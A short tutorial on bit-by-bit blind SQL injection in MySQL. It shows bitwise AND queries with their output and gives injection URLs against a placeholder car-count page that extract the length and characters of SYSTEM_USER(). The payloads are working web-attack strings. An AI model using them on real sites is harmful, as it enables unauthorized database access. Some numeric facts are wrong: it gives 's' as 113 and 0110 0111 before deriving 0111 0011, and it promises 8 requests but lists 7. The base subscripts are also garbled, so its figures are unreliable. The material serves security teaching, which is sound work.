# Blind SQL Injection # bit-by-bit Inference

On the last example we use binary search technique to get each character of the `SYSTEM_USER` by infering a grouped 8-bits(1 byte) through a selected requests.

Now you’ll use another technique when you’ve to select a single bit from a selected position on each request.

If you’ve as an example the character `s` which have a presentation in decimal of `11310` and in binary `0110 01112`, to use bit-by-bit technique for this case, you’ve to use bitwise `AND` against a byte that has the most significant bit at some position, if the predicate returns true the bit is `1` otherwise the bit is `0`.

Let’s start with the 8 requests for each significant bit set corresponding to `6410`, `3210`, `1610`, `810`, `410`, `210` and `110`.

``````mysql> SELECT ASCII('s') & 64 = 64;
+----------------------+
| ASCII('s') & 64 = 64 |
+----------------------+
|                    1 |
+----------------------+
``````
``````mysql> SELECT ASCII('s') & 32 = 32;
+----------------------+
| ASCII('s') & 32 = 32 |
+----------------------+
|                    1 |
+----------------------+``````
``````mysql> SELECT ASCII('s') & 16 = 16;
+----------------------+
| ASCII('s') & 16 = 16 |
+----------------------+
|                    1 |
+----------------------+``````
``````mysql> SELECT ASCII('s') & 8 = 8;
+----------------------+
| ASCII('s') & 8 = 8   |
+----------------------+
|                    0 |
+----------------------+``````
``````mysql> SELECT ASCII('s') & 4 = 4;
+----------------------+
| ASCII('s') & 4 = 4   |
+----------------------+
|                    0 |
+----------------------+``````
``````mysql> SELECT ASCII('s') & 2 = 2;
+----------------------+
| ASCII('s') & 2 = 2   |
+----------------------+
|                    1 |
+----------------------+``````
``````mysql> SELECT ASCII('s') & 1 = 1;
+----------------------+
| ASCII('s') & 1 = 1   |
+----------------------+
|                    1 |
+----------------------+``````

And that gives us a byte presentation of `0111 00112`.

Let’s apply the same method to infer the value of the `SYSTEM_USER` which is an unknown value.

You start by checking the length of `SYSTEM_USER` which gives you an idea on the number of characters (number of positions to check):

``LENGTH(SYSTEM_USER())``

http://example.com/count-cars.php?car_name=Ford’ AND LENGTH(SYSTEM_USER()) = ’14

Then you get the ASCII presentation of the first character and you compare it against `6410`:

``ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) & 64 = 64``

http://example.com/count-cars.php?car_name=Ford’ AND ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) %26 ’64’ = ’64

If the predicate is true the number of cars will be displayed, otherwise you’ll get the message `Nothing to show`.

You’ve to keep doing these requests, for each character(position) you’ve to do 8 requests starting from `6410` to `110`, note that the length of the username is `14`, which gives you a total of `(14 positions * 8 requests) = 112 requests`.